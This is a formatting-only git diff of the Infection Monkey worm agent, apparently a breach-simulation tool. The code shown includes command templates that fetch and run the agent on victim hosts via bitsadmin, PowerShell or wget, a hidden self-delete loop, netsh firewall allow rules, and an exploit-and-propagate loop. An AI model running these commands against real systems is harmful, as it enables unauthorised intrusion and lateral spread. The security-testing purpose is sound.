LOG.critical("".join(traceback.format_tb(tb))) + LOG.critical("{0}: {1}".format(ex_cls, ex)) sys.excepthook = log_uncaught_exceptions - LOG.info(">>>>>>>>>> Initializing monkey (%s): PID %s <<<<<<<<<<", - monkey_cls.__name__, os.getpid()) + LOG.info( + ">>>>>>>>>> Initializing monkey (%s): PID %s <<<<<<<<<<", monkey_cls.__name__, os.getpid() + ) LOG.info(f"version: {get_version()}") @@ -128,9 +138,16 @@ def main(): monkey.start() if WormConfiguration.serialize_config: - with open(config_file, 'w') as config_fo: + with open(config_file, "w") as config_fo: json_dict = WormConfiguration.as_dict() - json.dump(json_dict, config_fo, skipkeys=True, sort_keys=True, indent=4, separators=(',', ': ')) + json.dump( + json_dict, + config_fo, + skipkeys=True, + sort_keys=True, + indent=4, + separators=(",", ": "), + ) return True except Exception as e: diff --git a/monkey/infection_monkey/model/__init__.py b/monkey/infection_monkey/model/__init__.py index 4f3f2c27d..4f6f8de4a 100644 --- a/monkey/infection_monkey/model/__init__.py +++ b/monkey/infection_monkey/model/__init__.py @@ -1,6 +1,6 @@ from infection_monkey.model.host import VictimHost # noqa: F401 -__author__ = 'itamar' +__author__ = "itamar" MONKEY_ARG = "m0nk3y" DROPPER_ARG = "dr0pp3r" @@ -8,22 +8,46 @@ ID_STRING = "M0NK3Y3XPL0ITABLE" # CMD prefix for windows commands CMD_PREFIX = "cmd.exe /c" -DROPPER_CMDLINE_WINDOWS = '%s %%(dropper_path)s %s' % (CMD_PREFIX, DROPPER_ARG,) -MONKEY_CMDLINE_WINDOWS = '%s 
%%(monkey_path)s %s' % (CMD_PREFIX, MONKEY_ARG,) -MONKEY_CMDLINE_LINUX = './%%(monkey_filename)s %s' % (MONKEY_ARG,) -GENERAL_CMDLINE_LINUX = '(cd %(monkey_directory)s && %(monkey_commandline)s)' -DROPPER_CMDLINE_DETACHED_WINDOWS = '%s start cmd /c %%(dropper_path)s %s' % (CMD_PREFIX, DROPPER_ARG,) -MONKEY_CMDLINE_DETACHED_WINDOWS = '%s start cmd /c %%(monkey_path)s %s' % (CMD_PREFIX, MONKEY_ARG,) -MONKEY_CMDLINE_HTTP = '%s /c "bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s' \ - '&cmd /c %%(monkey_path)s %s"' % (CMD_PREFIX, MONKEY_ARG,) -DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & ' \ - 'if not exist %(file_path)s exit)) > NUL 2>&1 ' +DROPPER_CMDLINE_WINDOWS = "%s %%(dropper_path)s %s" % ( + CMD_PREFIX, + DROPPER_ARG, +) +MONKEY_CMDLINE_WINDOWS = "%s %%(monkey_path)s %s" % ( + CMD_PREFIX, + MONKEY_ARG, +) +MONKEY_CMDLINE_LINUX = "./%%(monkey_filename)s %s" % (MONKEY_ARG,) +GENERAL_CMDLINE_LINUX = "(cd %(monkey_directory)s && %(monkey_commandline)s)" +DROPPER_CMDLINE_DETACHED_WINDOWS = "%s start cmd /c %%(dropper_path)s %s" % ( + CMD_PREFIX, + DROPPER_ARG, +) +MONKEY_CMDLINE_DETACHED_WINDOWS = "%s start cmd /c %%(monkey_path)s %s" % ( + CMD_PREFIX, + MONKEY_ARG, +) +MONKEY_CMDLINE_HTTP = ( + '%s /c "bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s' + '&cmd /c %%(monkey_path)s %s"' + % ( + CMD_PREFIX, + MONKEY_ARG, + ) +) +DELAY_DELETE_CMD = ( + "cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & " + "if not exist %(file_path)s exit)) > NUL 2>&1 " +) # Commands used for downloading monkeys -POWERSHELL_HTTP_UPLOAD = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \'%(http_path)s\' -OutFile \'%(" \ - "monkey_path)s\' -UseBasicParsing\" " +POWERSHELL_HTTP_UPLOAD = ( + "powershell -NoLogo -Command \"Invoke-WebRequest -Uri '%(http_path)s' -OutFile '%(" + "monkey_path)s' -UseBasicParsing\" " +) WGET_HTTP_UPLOAD = "wget -O %(monkey_path)s %(http_path)s" -BITSADMIN_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s' +BITSADMIN_CMDLINE_HTTP = ( + "bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s" +) CHMOD_MONKEY = "chmod +x %(monkey_path)s" RUN_MONKEY = " %(monkey_path)s %(monkey_type)s %(parameters)s" # Commands used to check for architecture and if machine is exploitable @@ -33,13 +57,17 @@ GET_ARCH_WINDOWS = "wmic os get osarchitecture" GET_ARCH_LINUX = "lscpu" # All in one commands (upload, change permissions, run) -HADOOP_WINDOWS_COMMAND = "powershell -NoLogo -Command \"if (!(Test-Path '%(monkey_path)s')) { " \ - "Invoke-WebRequest -Uri '%(http_path)s' -OutFile '%(monkey_path)s' -UseBasicParsing }; " \ - " if (! (ps | ? {$_.path -eq '%(monkey_path)s'})) " \ - "{& %(monkey_path)s %(monkey_type)s %(parameters)s } \"" -HADOOP_LINUX_COMMAND = "! [ -f %(monkey_path)s ] " \ - "&& wget -O %(monkey_path)s %(http_path)s " \ - "; chmod +x %(monkey_path)s " \ - "&& %(monkey_path)s %(monkey_type)s %(parameters)s" +HADOOP_WINDOWS_COMMAND = ( + "powershell -NoLogo -Command \"if (!(Test-Path '%(monkey_path)s')) { " + "Invoke-WebRequest -Uri '%(http_path)s' -OutFile '%(monkey_path)s' -UseBasicParsing }; " + " if (! (ps | ? {$_.path -eq '%(monkey_path)s'})) " + '{& %(monkey_path)s %(monkey_type)s %(parameters)s } "' +) +HADOOP_LINUX_COMMAND = ( + "! 
[ -f %(monkey_path)s ] " + "&& wget -O %(monkey_path)s %(http_path)s " + "; chmod +x %(monkey_path)s " + "&& %(monkey_path)s %(monkey_type)s %(parameters)s" +) DOWNLOAD_TIMEOUT = 180 diff --git a/monkey/infection_monkey/model/host.py b/monkey/infection_monkey/model/host.py index d71446108..68b903d71 100644 --- a/monkey/infection_monkey/model/host.py +++ b/monkey/infection_monkey/model/host.py @@ -1,8 +1,8 @@ -__author__ = 'itamar' +__author__ = "itamar" class VictimHost(object): - def __init__(self, ip_addr, domain_name=''): + def __init__(self, ip_addr, domain_name=""): self.ip_addr = ip_addr self.domain_name = str(domain_name) self.os = {} @@ -41,7 +41,7 @@ class VictimHost(object): victim += "] Services - [" for k, v in list(self.services.items()): victim += "%s-%s " % (k, v) - victim += '] ICMP: %s ' % (self.icmp) + victim += "] ICMP: %s " % (self.icmp) victim += "target monkey: %s" % self.monkey_exe return victim diff --git a/monkey/infection_monkey/model/victim_host_generator.py b/monkey/infection_monkey/model/victim_host_generator.py index 1e9eba9c2..444c4a5ee 100644 --- a/monkey/infection_monkey/model/victim_host_generator.py +++ b/monkey/infection_monkey/model/victim_host_generator.py @@ -31,7 +31,7 @@ class VictimHostGenerator(object): for address in net_range: if not self.is_ip_scannable(address): # check if the IP should be skipped continue - if hasattr(net_range, 'domain_name'): + if hasattr(net_range, "domain_name"): victim = VictimHost(address, net_range.domain_name) else: victim = VictimHost(address) diff --git a/monkey/infection_monkey/model/victim_host_generator_test.py b/monkey/infection_monkey/model/victim_host_generator_test.py index 5511680d7..26ca99352 100644 --- a/monkey/infection_monkey/model/victim_host_generator_test.py +++ b/monkey/infection_monkey/model/victim_host_generator_test.py @@ -5,17 +5,16 @@ from infection_monkey.model.victim_host_generator import VictimHostGenerator class VictimHostGeneratorTester(TestCase): - def setUp(self): self.cidr_range = CidrRange("10.0.0.0/28", False) # this gives us 15 hosts - self.local_host_range = SingleIpRange('localhost') - self.random_single_ip_range = SingleIpRange('41.50.13.37') + self.local_host_range = SingleIpRange("localhost") + self.random_single_ip_range = SingleIpRange("41.50.13.37") def test_chunking(self): chunk_size = 3 # current test setup is 15+1+1-1 hosts test_ranges = [self.cidr_range, self.local_host_range, self.random_single_ip_range] - generator = VictimHostGenerator(test_ranges, '10.0.0.1', []) + generator = VictimHostGenerator(test_ranges, "10.0.0.1", []) victims = generator.generate_victims(chunk_size) for i in range(5): # quickly check the equally sided chunks self.assertEqual(len(next(victims)), chunk_size) @@ -23,14 +22,14 @@ class VictimHostGeneratorTester(TestCase): self.assertEqual(len(victim_chunk_last), 1) def test_remove_blocked_ip(self): - generator = VictimHostGenerator(self.cidr_range, ['10.0.0.1'], []) + generator = VictimHostGenerator(self.cidr_range, ["10.0.0.1"], []) victims = list(generator.generate_victims_from_range(self.cidr_range)) self.assertEqual(len(victims), 14) # 15 minus the 1 we blocked def test_remove_local_ips(self): generator = VictimHostGenerator([], [], []) - generator.local_addresses = ['127.0.0.1'] + generator.local_addresses = ["127.0.0.1"] victims = list(generator.generate_victims_from_range(self.local_host_range)) self.assertEqual(len(victims), 0) # block the local IP @@ -39,9 +38,9 @@ class VictimHostGeneratorTester(TestCase): generator = 
VictimHostGenerator([], [], []) # dummy object victims = list(generator.generate_victims_from_range(self.local_host_range)) self.assertEqual(len(victims), 1) - self.assertEqual(victims[0].domain_name, 'localhost') + self.assertEqual(victims[0].domain_name, "localhost") # don't generate for other victims victims = list(generator.generate_victims_from_range(self.random_single_ip_range)) self.assertEqual(len(victims), 1) - self.assertEqual(victims[0].domain_name, '') + self.assertEqual(victims[0].domain_name, "") diff --git a/monkey/infection_monkey/monkey.py b/monkey/infection_monkey/monkey.py index 3a5c5619f..d1871da22 100644 --- a/monkey/infection_monkey/monkey.py +++ b/monkey/infection_monkey/monkey.py @@ -32,13 +32,17 @@ from infection_monkey.telemetry.trace_telem import TraceTelem from infection_monkey.telemetry.tunnel_telem import TunnelTelem from infection_monkey.utils.environment import is_windows_os from infection_monkey.utils.exceptions.planned_shutdown_exception import PlannedShutdownException -from infection_monkey.utils.monkey_dir import create_monkey_dir, get_monkey_dir_path, remove_monkey_dir +from infection_monkey.utils.monkey_dir import ( + create_monkey_dir, + get_monkey_dir_path, + remove_monkey_dir, +) from infection_monkey.utils.monkey_log_path import get_monkey_log_path from infection_monkey.windows_upgrader import WindowsUpgrader MAX_DEPTH_REACHED_MESSAGE = "Reached max depth, shutting down" -__author__ = 'itamar' +__author__ = "itamar" LOG = logging.getLogger(__name__) @@ -69,11 +73,11 @@ class InfectionMonkey(object): raise Exception("Another instance of the monkey is already running") arg_parser = argparse.ArgumentParser() - arg_parser.add_argument('-p', '--parent') - arg_parser.add_argument('-t', '--tunnel') - arg_parser.add_argument('-s', '--server') - arg_parser.add_argument('-d', '--depth', type=int) - arg_parser.add_argument('-vp', '--vulnerable-port') + arg_parser.add_argument("-p", "--parent") + arg_parser.add_argument("-t", "--tunnel") + arg_parser.add_argument("-s", "--server") + arg_parser.add_argument("-d", "--depth", type=int) + arg_parser.add_argument("-vp", "--vulnerable-port") self._opts, self._args = arg_parser.parse_known_args(self._args) self.log_arguments() @@ -96,7 +100,9 @@ class InfectionMonkey(object): LOG.debug("Added default server: %s" % self._default_server) WormConfiguration.command_servers.insert(0, self._default_server) else: - LOG.debug("Default server: %s is already in command servers list" % self._default_server) + LOG.debug( + "Default server: %s is already in command servers list" % self._default_server + ) def start(self): try: @@ -155,8 +161,10 @@ class InfectionMonkey(object): if not self._keep_running or not WormConfiguration.alive: break - machines = self._network.get_victim_machines(max_find=WormConfiguration.victims_max_find, - stop_callback=ControlClient.check_for_stop) + machines = self._network.get_victim_machines( + max_find=WormConfiguration.victims_max_find, + stop_callback=ControlClient.check_for_stop, + ) is_empty = True for machine in machines: if ControlClient.check_for_stop(): @@ -164,20 +172,25 @@ class InfectionMonkey(object): is_empty = False for finger in self._fingerprint: - LOG.info("Trying to get OS fingerprint from %r with module %s", - machine, finger.__class__.__name__) + LOG.info( + "Trying to get OS fingerprint from %r with module %s", + machine, + finger.__class__.__name__, + ) try: finger.get_host_fingerprint(machine) except BaseException as exc: - LOG.error("Failed to run fingerprinter %s, exception 
%s" % finger.__class__.__name__, - str(exc)) + LOG.error( + "Failed to run fingerprinter %s, exception %s" + % finger.__class__.__name__, + str(exc), + ) ScanTelem(machine).send() # skip machines that we've already exploited if machine in self._exploited_machines: - LOG.debug("Skipping %r - already exploited", - machine) + LOG.debug("Skipping %r - already exploited", machine) continue elif machine in self._fail_exploitation_machines: if WormConfiguration.retry_failed_explotation: @@ -190,25 +203,35 @@ class InfectionMonkey(object): monkey_tunnel.set_tunnel_for_host(machine) if self._default_server: if self._network.on_island(self._default_server): - machine.set_default_server(get_interface_to_target(machine.ip_addr) + - (':' + self._default_server_port - if self._default_server_port else '')) + machine.set_default_server( + get_interface_to_target(machine.ip_addr) + + ( + ":" + self._default_server_port + if self._default_server_port + else "" + ) + ) else: machine.set_default_server(self._default_server) - LOG.debug("Default server for machine: %r set to %s" % (machine, machine.default_server)) + LOG.debug( + "Default server for machine: %r set to %s" + % (machine, machine.default_server) + ) # Order exploits according to their type - self._exploiters = sorted(self._exploiters, key=lambda exploiter_: exploiter_.EXPLOIT_TYPE.value) + self._exploiters = sorted( + self._exploiters, key=lambda exploiter_: exploiter_.EXPLOIT_TYPE.value + ) host_exploited = False for exploiter in [exploiter(machine) for exploiter in self._exploiters]: if self.try_exploiting(machine, exploiter): host_exploited = True - VictimHostTelem('T1210', ScanStatus.USED, machine=machine).send() + VictimHostTelem("T1210", ScanStatus.USED, machine=machine).send() if exploiter.RUNS_AGENT_ON_SUCCESS: break # if adding machine to exploited, won't try other exploits on it if not host_exploited: self._fail_exploitation_machines.add(machine) - VictimHostTelem('T1210', ScanStatus.SCANNED, machine=machine).send() + VictimHostTelem("T1210", ScanStatus.SCANNED, machine=machine).send() if not self._keep_running: break @@ -226,7 +249,9 @@ class InfectionMonkey(object): # connect to the tunnel if len(self._exploited_machines) > 0: time_to_sleep = WormConfiguration.keep_tunnel_open_time - LOG.info("Sleeping %d seconds for exploited machines to connect to tunnel", time_to_sleep) + LOG.info( + "Sleeping %d seconds for exploited machines to connect to tunnel", time_to_sleep + ) time.sleep(time_to_sleep) if monkey_tunnel: @@ -236,7 +261,9 @@ class InfectionMonkey(object): post_breach_phase.join() except PlannedShutdownException: - LOG.info("A planned shutdown of the Monkey occurred. Logging the reason and finishing execution.") + LOG.info( + "A planned shutdown of the Monkey occurred. Logging the reason and finishing execution." 
+ ) LOG.exception("Planned shutdown, reason:") def start_post_breach_phase(self): @@ -279,7 +306,9 @@ class InfectionMonkey(object): InfectionMonkey.close_tunnel() firewall.close() else: - StateTelem(is_done=True, version=get_version()).send() # Signal the server (before closing the tunnel) + StateTelem( + is_done=True, version=get_version() + ).send() # Signal the server (before closing the tunnel) InfectionMonkey.close_tunnel() firewall.close() if WormConfiguration.send_log_to_server: @@ -291,7 +320,9 @@ class InfectionMonkey(object): @staticmethod def close_tunnel(): - tunnel_address = ControlClient.proxies.get('https', '').replace('https://', '').split(':')[0] + tunnel_address = ( + ControlClient.proxies.get("https", "").replace("https://", "").split(":")[0] + ) if tunnel_address: LOG.info("Quitting tunnel %s", tunnel_address) tunnel.quit_tunnel(tunnel_address) @@ -301,18 +332,23 @@ class InfectionMonkey(object): status = ScanStatus.USED if remove_monkey_dir() else ScanStatus.SCANNED T1107Telem(status, get_monkey_dir_path()).send() - if WormConfiguration.self_delete_in_cleanup \ - and -1 == sys.executable.find('python'): + if WormConfiguration.self_delete_in_cleanup and -1 == sys.executable.find("python"): try: status = None if "win32" == sys.platform: from subprocess import CREATE_NEW_CONSOLE, STARTF_USESHOWWINDOW, SW_HIDE + startupinfo = subprocess.STARTUPINFO() startupinfo.dwFlags = CREATE_NEW_CONSOLE | STARTF_USESHOWWINDOW startupinfo.wShowWindow = SW_HIDE - subprocess.Popen(DELAY_DELETE_CMD % {'file_path': sys.executable}, - stdin=None, stdout=None, stderr=None, - close_fds=True, startupinfo=startupinfo) + subprocess.Popen( + DELAY_DELETE_CMD % {"file_path": sys.executable}, + stdin=None, + stdout=None, + stderr=None, + close_fds=True, + startupinfo=startupinfo, + ) else: os.remove(sys.executable) status = ScanStatus.USED @@ -325,10 +361,10 @@ class InfectionMonkey(object): def send_log(self): monkey_log_path = get_monkey_log_path() if os.path.exists(monkey_log_path): - with open(monkey_log_path, 'r') as f: + with open(monkey_log_path, "r") as f: log = f.read() else: - log = '' + log = "" ControlClient.send_log(log) @@ -340,8 +376,12 @@ class InfectionMonkey(object): :return: True if successfully exploited, False otherwise """ if not exploiter.is_os_supported(): - LOG.info("Skipping exploiter %s host:%r, os %s is not supported", - exploiter.__class__.__name__, machine, machine.os) + LOG.info( + "Skipping exploiter %s host:%r, os %s is not supported", + exploiter.__class__.__name__, + machine, + machine.os, + ) return False LOG.info("Trying to exploit %r with exploiter %s...", machine, exploiter.__class__.__name__) @@ -353,17 +393,32 @@ class InfectionMonkey(object): self.successfully_exploited(machine, exploiter, exploiter.RUNS_AGENT_ON_SUCCESS) return True else: - LOG.info("Failed exploiting %r with exploiter %s", machine, exploiter.__class__.__name__) + LOG.info( + "Failed exploiting %r with exploiter %s", machine, exploiter.__class__.__name__ + ) except ExploitingVulnerableMachineError as exc: - LOG.error("Exception while attacking %s using %s: %s", - machine, exploiter.__class__.__name__, exc) + LOG.error( + "Exception while attacking %s using %s: %s", + machine, + exploiter.__class__.__name__, + exc, + ) self.successfully_exploited(machine, exploiter, exploiter.RUNS_AGENT_ON_SUCCESS) return True except FailedExploitationError as e: - LOG.info("Failed exploiting %r with exploiter %s, %s", machine, exploiter.__class__.__name__, e) + LOG.info( + "Failed exploiting %r with 
exploiter %s, %s", + machine, + exploiter.__class__.__name__, + e, + ) except Exception as exc: - LOG.exception("Exception while attacking %s using %s: %s", - machine, exploiter.__class__.__name__, exc) + LOG.exception( + "Exception while attacking %s using %s: %s", + machine, + exploiter.__class__.__name__, + exc, + ) finally: exploiter.send_exploit_telemetry(result) return False @@ -377,8 +432,7 @@ class InfectionMonkey(object): if RUNS_AGENT_ON_SUCCESS: self._exploited_machines.add(machine) - LOG.info("Successfully propagated to %s using %s", - machine, exploiter.__class__.__name__) + LOG.info("Successfully propagated to %s using %s", machine, exploiter.__class__.__name__) # check if max-exploitation limit is reached if WormConfiguration.victims_max_exploit <= len(self._exploited_machines): @@ -388,9 +442,9 @@ class InfectionMonkey(object): def set_default_port(self): try: - self._default_server_port = self._default_server.split(':')[1] + self._default_server_port = self._default_server.split(":")[1] except KeyError: - self._default_server_port = '' + self._default_server_port = "" def set_default_server(self): """ @@ -399,7 +453,8 @@ class InfectionMonkey(object): """ if not ControlClient.find_server(default_tunnel=self._default_tunnel): raise PlannedShutdownException( - "Monkey couldn't find server with {} default tunnel.".format(self._default_tunnel)) + "Monkey couldn't find server with {} default tunnel.".format(self._default_tunnel) + ) self._default_server = WormConfiguration.current_server LOG.debug("default server set to: %s" % self._default_server) diff --git a/monkey/infection_monkey/monkeyfs.py b/monkey/infection_monkey/monkeyfs.py index 2d14156b3..31b2e6007 100644 --- a/monkey/infection_monkey/monkeyfs.py +++ b/monkey/infection_monkey/monkeyfs.py @@ -1,9 +1,9 @@ import os from io import BytesIO -__author__ = 'hoffer' +__author__ = "hoffer" -MONKEYFS_PREFIX = 'monkeyfs://' +MONKEYFS_PREFIX = "monkeyfs://" open_orig = open @@ -11,7 +11,7 @@ open_orig = open class VirtualFile(BytesIO): _vfs = {} # virtual File-System - def __init__(self, name, mode='r', buffering=None): + def __init__(self, name, mode="r", buffering=None): if not name.startswith(MONKEYFS_PREFIX): name = MONKEYFS_PREFIX + name self.name = name @@ -53,7 +53,7 @@ def virtual_path(name): # noinspection PyShadowingBuiltins -def open(name, mode='r', buffering=-1): +def open(name, mode="r", buffering=-1): # use normal open for regular paths, and our "virtual" open for monkeyfs:// paths if name.startswith(MONKEYFS_PREFIX): return VirtualFile(name, mode, buffering) diff --git a/monkey/infection_monkey/network/HostFinger.py b/monkey/infection_monkey/network/HostFinger.py index b48c01111..0ff0cb8e0 100644 --- a/monkey/infection_monkey/network/HostFinger.py +++ b/monkey/infection_monkey/network/HostFinger.py @@ -21,8 +21,8 @@ class HostFinger(Plugin): def init_service(self, services, service_key, port): services[service_key] = {} - services[service_key]['display_name'] = self._SCANNED_SERVICE - services[service_key]['port'] = port + services[service_key]["display_name"] = self._SCANNED_SERVICE + services[service_key]["port"] = port @abstractmethod def get_host_fingerprint(self, host): diff --git a/monkey/infection_monkey/network/__init__.py b/monkey/infection_monkey/network/__init__.py index 05a457b0c..9d0748729 100644 --- a/monkey/infection_monkey/network/__init__.py +++ b/monkey/infection_monkey/network/__init__.py @@ -1 +1 @@ -__author__ = 'itamar' +__author__ = "itamar" diff --git 
a/monkey/infection_monkey/network/elasticfinger.py b/monkey/infection_monkey/network/elasticfinger.py index e7a60be17..e7e2518b6 100644 --- a/monkey/infection_monkey/network/elasticfinger.py +++ b/monkey/infection_monkey/network/elasticfinger.py @@ -12,14 +12,15 @@ from infection_monkey.network.HostFinger import HostFinger ES_PORT = 9200 ES_HTTP_TIMEOUT = 5 LOG = logging.getLogger(__name__) -__author__ = 'danielg' +__author__ = "danielg" class ElasticFinger(HostFinger): """ - Fingerprints elastic search clusters, only on port 9200 + Fingerprints elastic search clusters, only on port 9200 """ - _SCANNED_SERVICE = 'Elastic search' + + _SCANNED_SERVICE = "Elastic search" def __init__(self): self._config = infection_monkey.config.WormConfiguration @@ -31,13 +32,13 @@ class ElasticFinger(HostFinger): :return: Success/failure, data is saved in the host struct """ try: - url = 'http://%s:%s/' % (host.ip_addr, ES_PORT) + url = "http://%s:%s/" % (host.ip_addr, ES_PORT) with closing(requests.get(url, timeout=ES_HTTP_TIMEOUT)) as req: data = json.loads(req.text) self.init_service(host.services, ES_SERVICE, ES_PORT) - host.services[ES_SERVICE]['cluster_name'] = data['cluster_name'] - host.services[ES_SERVICE]['name'] = data['name'] - host.services[ES_SERVICE]['version'] = data['version']['number'] + host.services[ES_SERVICE]["cluster_name"] = data["cluster_name"] + host.services[ES_SERVICE]["name"] = data["name"] + host.services[ES_SERVICE]["version"] = data["version"]["number"] return True except Timeout: LOG.debug("Got timeout while trying to read header information") diff --git a/monkey/infection_monkey/network/firewall.py b/monkey/infection_monkey/network/firewall.py index f66bea7f4..cddba49fe 100644 --- a/monkey/infection_monkey/network/firewall.py +++ b/monkey/infection_monkey/network/firewall.py @@ -4,9 +4,15 @@ import sys def _run_netsh_cmd(command, args): - cmd = subprocess.Popen("netsh %s %s" % (command, " ".join(['%s="%s"' % (key, value) for key, value in list(args.items()) - if value])), stdout=subprocess.PIPE) - return cmd.stdout.read().strip().lower().endswith('ok.') + cmd = subprocess.Popen( + "netsh %s %s" + % ( + command, + " ".join(['%s="%s"' % (key, value) for key, value in list(args.items()) if value]), + ), + stdout=subprocess.PIPE, + ) + return cmd.stdout.read().strip().lower().endswith("ok.") class FirewallApp(object): @@ -38,25 +44,24 @@ class WinAdvFirewall(FirewallApp): def is_enabled(self): try: - cmd = subprocess.Popen('netsh advfirewall show currentprofile', stdout=subprocess.PIPE) + cmd = subprocess.Popen("netsh advfirewall show currentprofile", stdout=subprocess.PIPE) out = cmd.stdout.readlines() for line in out: - if line.startswith('State'): + if line.startswith("State"): state = line.split()[-1].strip() return state == "ON" except Exception: return None - def add_firewall_rule(self, name="Firewall", direction="in", action="allow", program=sys.executable, **kwargs): - netsh_args = {'name': name, - 'dir': direction, - 'action': action, - 'program': program} + def add_firewall_rule( + self, name="Firewall", direction="in", action="allow", program=sys.executable, **kwargs + ): + netsh_args = {"name": name, "dir": direction, "action": action, "program": program} netsh_args.update(kwargs) try: - if _run_netsh_cmd('advfirewall firewall add rule', netsh_args): + if _run_netsh_cmd("advfirewall firewall add rule", netsh_args): self._rules[name] = netsh_args return True else: @@ -65,11 +70,11 @@ class WinAdvFirewall(FirewallApp): return None def remove_firewall_rule(self, 
name="Firewall", **kwargs): - netsh_args = {'name': name} + netsh_args = {"name": name} netsh_args.update(kwargs) try: - if _run_netsh_cmd('advfirewall firewall delete rule', netsh_args): + if _run_netsh_cmd("advfirewall firewall delete rule", netsh_args): if name in self._rules: del self._rules[name] return True @@ -83,10 +88,12 @@ class WinAdvFirewall(FirewallApp): return True for rule in list(self._rules.values()): - if rule.get('program') == sys.executable and \ - 'in' == rule.get('dir') and \ - 'allow' == rule.get('action') and \ - 4 == len(list(rule.keys())): + if ( + rule.get("program") == sys.executable + and "in" == rule.get("dir") + and "allow" == rule.get("action") + and 4 == len(list(rule.keys())) + ): return True return False @@ -104,29 +111,33 @@ class WinFirewall(FirewallApp): def is_enabled(self): try: - cmd = subprocess.Popen('netsh firewall show state', stdout=subprocess.PIPE) + cmd = subprocess.Popen("netsh firewall show state", stdout=subprocess.PIPE) out = cmd.stdout.readlines() for line in out: - if line.startswith('Operational mode'): - state = line.split('=')[-1].strip() - elif line.startswith('The service has not been started.'): + if line.startswith("Operational mode"): + state = line.split("=")[-1].strip() + elif line.startswith("The service has not been started."): return False return state == "Enable" except Exception: return None - def add_firewall_rule(self, rule='allowedprogram', name="Firewall", mode="ENABLE", program=sys.executable, - **kwargs): - netsh_args = {'name': name, - 'mode': mode, - 'program': program} + def add_firewall_rule( + self, + rule="allowedprogram", + name="Firewall", + mode="ENABLE", + program=sys.executable, + **kwargs, + ): + netsh_args = {"name": name, "mode": mode, "program": program} netsh_args.update(kwargs) try: - if _run_netsh_cmd('firewall add %s' % rule, netsh_args): - netsh_args['rule'] = rule + if _run_netsh_cmd("firewall add %s" % rule, netsh_args): + netsh_args["rule"] = rule self._rules[name] = netsh_args return True else: @@ -134,12 +145,18 @@ class WinFirewall(FirewallApp): except Exception: return None - def remove_firewall_rule(self, rule='allowedprogram', name="Firewall", mode="ENABLE", program=sys.executable, - **kwargs): - netsh_args = {'program': program} + def remove_firewall_rule( + self, + rule="allowedprogram", + name="Firewall", + mode="ENABLE", + program=sys.executable, + **kwargs, + ): + netsh_args = {"program": program} netsh_args.update(kwargs) try: - if _run_netsh_cmd('firewall delete %s' % rule, netsh_args): + if _run_netsh_cmd("firewall delete %s" % rule, netsh_args): if name in self._rules: del self._rules[name] return True @@ -153,7 +170,7 @@ class WinFirewall(FirewallApp): return True for rule in list(self._rules.values()): - if rule.get('program') == sys.executable and 'ENABLE' == rule.get('mode'): + if rule.get("program") == sys.executable and "ENABLE" == rule.get("mode"): return True return False @@ -167,7 +184,7 @@ class WinFirewall(FirewallApp): if sys.platform == "win32": try: - win_ver = int(platform.version().split('.')[0]) + win_ver = int(platform.version().split(".")[0]) except Exception: win_ver = 0 if win_ver > 5: diff --git a/monkey/infection_monkey/network/httpfinger.py b/monkey/infection_monkey/network/httpfinger.py index 86c48cbde..8fa6071e7 100644 --- a/monkey/infection_monkey/network/httpfinger.py +++ b/monkey/infection_monkey/network/httpfinger.py @@ -10,7 +10,8 @@ class HTTPFinger(HostFinger): """ Goal is to recognise HTTP servers, where what we currently care about is apache. 
""" - _SCANNED_SERVICE = 'HTTP' + + _SCANNED_SERVICE = "HTTP" def __init__(self): self._config = infection_monkey.config.WormConfiguration @@ -35,11 +36,11 @@ class HTTPFinger(HostFinger): for url in (https, http): # start with https and downgrade try: with closing(head(url, verify=False, timeout=1)) as req: # noqa: DUO123 - server = req.headers.get('Server') - ssl = True if 'https://' in url else False - self.init_service(host.services, ('tcp-' + port[1]), port[0]) - host.services['tcp-' + port[1]]['name'] = 'http' - host.services['tcp-' + port[1]]['data'] = (server, ssl) + server = req.headers.get("Server") + ssl = True if "https://" in url else False + self.init_service(host.services, ("tcp-" + port[1]), port[0]) + host.services["tcp-" + port[1]]["name"] = "http" + host.services["tcp-" + port[1]]["data"] = (server, ssl) LOG.info("Port %d is open on host %s " % (port[0], host)) break # https will be the same on the same port except Timeout: diff --git a/monkey/infection_monkey/network/info.py b/monkey/infection_monkey/network/info.py index 22de0eebb..21adae9f8 100644 --- a/monkey/infection_monkey/network/info.py +++ b/monkey/infection_monkey/network/info.py @@ -16,7 +16,7 @@ from infection_monkey.utils.environment import is_windows_os TIMEOUT = 15 LOOPBACK_NAME = b"lo" SIOCGIFADDR = 0x8915 # get PA address -SIOCGIFNETMASK = 0x891b # get network PA mask +SIOCGIFNETMASK = 0x891B # get network PA mask RTF_UP = 0x0001 # Route usable RTF_REJECT = 0x0200 @@ -27,36 +27,40 @@ def get_host_subnets(): Each subnet item contains the host IP in that network + the subnet. :return: List of dict, keys are "addr" and "subnet" """ - ipv4_nets = [netifaces.ifaddresses(interface)[netifaces.AF_INET] - for interface in netifaces.interfaces() - if netifaces.AF_INET in netifaces.ifaddresses(interface) - ] + ipv4_nets = [ + netifaces.ifaddresses(interface)[netifaces.AF_INET] + for interface in netifaces.interfaces() + if netifaces.AF_INET in netifaces.ifaddresses(interface) + ] # flatten ipv4_nets = itertools.chain.from_iterable(ipv4_nets) # remove loopback - ipv4_nets = [network for network in ipv4_nets if network['addr'] != '127.0.0.1'] + ipv4_nets = [network for network in ipv4_nets if network["addr"] != "127.0.0.1"] # remove auto conf - ipv4_nets = [network for network in ipv4_nets if not network['addr'].startswith('169.254')] + ipv4_nets = [network for network in ipv4_nets if not network["addr"].startswith("169.254")] for network in ipv4_nets: - if 'broadcast' in network: - network.pop('broadcast') + if "broadcast" in network: + network.pop("broadcast") for attr in network: network[attr] = network[attr] return ipv4_nets if is_windows_os(): + def local_ips(): local_hostname = socket.gethostname() return socket.gethostbyname_ex(local_hostname)[2] def get_routes(): raise NotImplementedError() + + else: from fcntl import ioctl def local_ips(): - valid_ips = [network['addr'] for network in get_host_subnets()] + valid_ips = [network["addr"] for network in get_host_subnets()] return valid_ips def get_routes(): # based on scapy implementation for route parsing @@ -92,10 +96,15 @@ else: ifaddr = socket.inet_ntoa(ifreq[20:24]) else: continue - routes.append((socket.htonl(int(dst, 16)) 